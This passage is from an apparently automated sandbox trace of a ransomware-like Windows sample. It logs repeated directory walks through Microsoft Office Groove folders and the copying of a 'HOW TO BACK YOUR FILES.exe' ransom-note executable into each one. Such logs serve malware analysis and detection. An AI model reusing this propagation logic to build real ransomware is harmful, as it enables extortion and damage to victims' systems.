ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c3b8160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.683] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.683] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.683] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview" [0071.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1d98 | out: hHeap=0x2b0000) returned 1 [0071.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26c0 | out: hHeap=0x2b0000) returned 1 [0071.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview") returned 98 [0071.683] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview" [0071.683] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.683] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.689] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.689] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51741df0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c3b8160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c3b8160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.689] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.689] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.689] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview" [0071.689] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0071.690] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26a0 | out: hHeap=0x2b0000) returned 1 [0071.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview") returned 90 [0071.690] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview" [0071.690] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.690] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.699] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.699] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51174850, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c3de2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c3de2c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.700] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.700] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.700] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare" [0071.700] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e3000 | out: hHeap=0x2b0000) returned 1 [0071.700] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2680 | out: hHeap=0x2b0000) returned 1 [0071.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare") returned 83 [0071.700] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare" [0071.700] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.700] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\documentshare\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.704] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.704] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x709f1ef0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c3de2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c3de2c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.704] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.704] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.705] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion" [0071.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2f50 | out: hHeap=0x2b0000) returned 1 [0071.705] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2660 | out: hHeap=0x2b0000) returned 1 [0071.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion") returned 80 [0071.705] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion" [0071.705] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.705] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.720] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.720] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c404420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c404420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.720] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.720] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.720] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers" [0071.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d77a8 | out: hHeap=0x2b0000) returned 1 [0071.720] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0071.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers") returned 79 [0071.721] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers" [0071.721] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.721] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.742] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.742] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c42a580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c42a580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.742] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.742] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.742] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData" [0071.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2ea0 | out: hHeap=0x2b0000) returned 1 [0071.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0071.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData") returned 80 [0071.743] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData" [0071.743] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.743] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.750] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.750] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51317770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c4506e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c4506e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.752] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.752] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.753] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar" [0071.753] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0071.753] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0071.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar") returned 78 [0071.753] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar" [0071.753] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.753] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\calendar\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.763] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.763] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Calendar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51bb8730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c476840, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c476840, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.763] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.763] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.763] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs" [0071.763] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0071.763] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0071.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs") returned 58 [0071.763] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs" [0071.763] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.764] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.774] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.774] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51bb8730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c49c9a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c49c9a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.776] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.776] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.793] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds" [0071.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0071.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0071.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds") returned 56 [0071.793] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds" [0071.793] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.793] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.807] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.807] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51b925d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c4c2b00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c4c2b00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.807] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.807] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.807] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things" [0071.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0071.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0071.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things") returned 63 [0071.807] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things" [0071.807] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.807] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.822] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.822] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51ce9230, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c50edc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c50edc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.822] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.822] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.822] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places" [0071.822] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0071.822] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0071.822] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places") returned 63 [0071.823] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places" [0071.823] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.823] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.837] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.837] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft 